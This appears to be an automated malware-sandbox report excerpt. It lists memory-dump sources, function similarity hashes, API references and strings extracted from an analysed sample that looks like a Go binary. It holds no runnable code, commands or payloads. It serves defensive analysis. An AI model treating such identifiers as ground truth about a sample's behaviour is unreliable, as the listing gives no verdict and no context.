                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 539475747-3084827643
                                                              • Opcode ID: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                              • Instruction ID: a9501051e93265181c2e1d6d8bd9116db1745cd3841fb9a39a218ce3b73acffb
                                                              • Opcode Fuzzy Hash: 3e5e89516c3b208d4de2910388d9803b3dbd8c46d2e262e577940497b006c2ed
                                                              • Instruction Fuzzy Hash: 3BF0BE25E1A743A1E7048B55E4000B92220EF49B81F984435EA1D83B5ECF3CE9A6C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • try_get_function.LIBVCRUNTIME ref: 00007FF6A00B0FA5
                                                              • TlsSetValue.KERNEL32(?,?,0000E94925CDEBB0,00007FF6A00AEF26,?,?,0000E94925CDEBB0,00007FF6A00A57A9,?,?,?,?,00007FF6A00B507E,?,?,00000000), ref: 00007FF6A00B0FBC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID: Valuetry_get_function
                                                              • String ID: FlsSetValue
                                                              • API String ID: 738293619-3750699315
                                                              • Opcode ID: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                              • Instruction ID: b1b54d6434e746d4eb209d6ff548d7f4248a6066c4d0757aa75a306779452760
                                                              • Opcode Fuzzy Hash: 0d8a84be871c5973d44aa728ee23869030e7b3f8ed9764413539ddc368b6f7a8
                                                              • Instruction Fuzzy Hash: 1AE0ED21B2A603B1FB188B20E8000B92222AF49781F988036C90DC639ECE3CE9B4C310
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • ", xrefs: 00428C69
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                              • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                              • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.430180091.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000025.00000002.430132002.0000000000400000.00000002.00020000.sdmp
                                                              • Associated: 00000025.00000002.433560714.00000000008C3000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433572877.00000000008D1000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433583818.00000000008D4000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433592979.00000000008D7000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433604561.00000000008D8000.00000080.00020000.sdmp
                                                              • Associated: 00000025.00000002.433616399.00000000008D9000.00000004.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                              • API String ID: 0-1070706453
                                                              • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                              • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                              • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.430180091.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000025.00000002.430132002.0000000000400000.00000002.00020000.sdmp
                                                              • Associated: 00000025.00000002.433560714.00000000008C3000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433572877.00000000008D1000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433583818.00000000008D4000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433592979.00000000008D7000.00000040.00020000.sdmp
                                                              • Associated: 00000025.00000002.433604561.00000000008D8000.00000080.00020000.sdmp
                                                              • Associated: 00000025.00000002.433616399.00000000008D9000.00000004.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                              • API String ID: 0-2527030486
                                                              • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                              • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              Non-executed Functions

                                                              Strings
                                                              • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait , xrefs: 00428B96
                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to, xrefs: 00428C60
                                                              • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is , xrefs: 00428C05
                                                              • ", xrefs: 00428C69
                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00428C2C
                                                              • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 00428BC0
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.621851748.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000002A.00000002.621834680.0000000000400000.00000002.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625598433.00000000008C3000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625616282.00000000008D1000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625632697.00000000008D4000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625643137.00000000008D7000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625660103.00000000008D8000.00000080.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625676744.00000000008D9000.00000004.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusfailed to apply ACL to$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdumping heapend tracegcentersyscallexit status failed to %sfailed to %wgcpacertraceget UUID: %wgetaddrinfowhost is $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filesunknown Go type: %vunknown certificateunknown cipher typeunknown status codeunknown wait
                                                              • API String ID: 0-1070706453
                                                              • Opcode ID: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction ID: d05530f15c22603299acca85900aed5cb2d67bbfa8ea3cc37d9bd2921fc2a2af
                                                              • Opcode Fuzzy Hash: 35bfc13783085809ff100db792aae9c6576bf432ec796ad2e4c0f2543c7307a5
                                                              • Instruction Fuzzy Hash: E95105B42097118FD340EF29D58575EBBE0FF48708F808A2EE88887352E7389944DF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked= , xrefs: 00434566
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br, xrefs: 00434662
                                                              • m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr, xrefs: 00434588
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004345D4
                                                              Memory Dump Source
                                                              • Source File: 0000002A.00000002.621851748.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000002A.00000002.621834680.0000000000400000.00000002.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625598433.00000000008C3000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625616282.00000000008D1000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625632697.00000000008D4000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625643137.00000000008D7000.00000040.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625660103.00000000008D8000.00000080.00020000.sdmp
                                                              • Associated: 0000002A.00000002.625676744.00000000008D9000.00000004.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=$WINDIR\rss%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPr$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestart copied file: %wstartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileunexpected )unknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid heap_marked=
                                                              • API String ID: 0-2527030486
                                                              • Opcode ID: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction ID: 7f80efca96c7c0026b2bbb8fce386263dcbd652a6508ac33117d8161810f2d9f
                                                              • Opcode Fuzzy Hash: 8b97a09f3ca774cfadb3114678e64e069106bda406771d947f6698ffa7ea8ee8
                                                              • Instruction Fuzzy Hash: CE51D4B46083158FD704EF25D185B6ABBE0BF88308F41996EE48987352D778D888DF96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%